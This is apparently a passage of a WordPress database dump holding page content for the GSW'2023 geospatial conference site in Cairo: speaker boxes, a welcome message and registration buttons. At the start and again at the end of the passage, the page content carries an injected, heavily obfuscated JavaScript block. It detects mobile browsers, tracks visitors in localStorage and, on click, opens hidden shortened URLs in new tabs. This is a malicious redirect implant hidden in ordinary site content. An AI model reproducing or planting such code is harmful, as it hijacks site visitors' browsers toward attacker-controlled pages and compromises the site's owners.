_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-14 21:31:21','2022-10-14 21:31:21','',2167,'https://gsw2023.com/?p=2853',0,'revision','',0),
(2854,1,'2022-10-14 21:37:59','2022-10-14 21:37:59','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/2\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\" dt_text_icon_title=\"\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 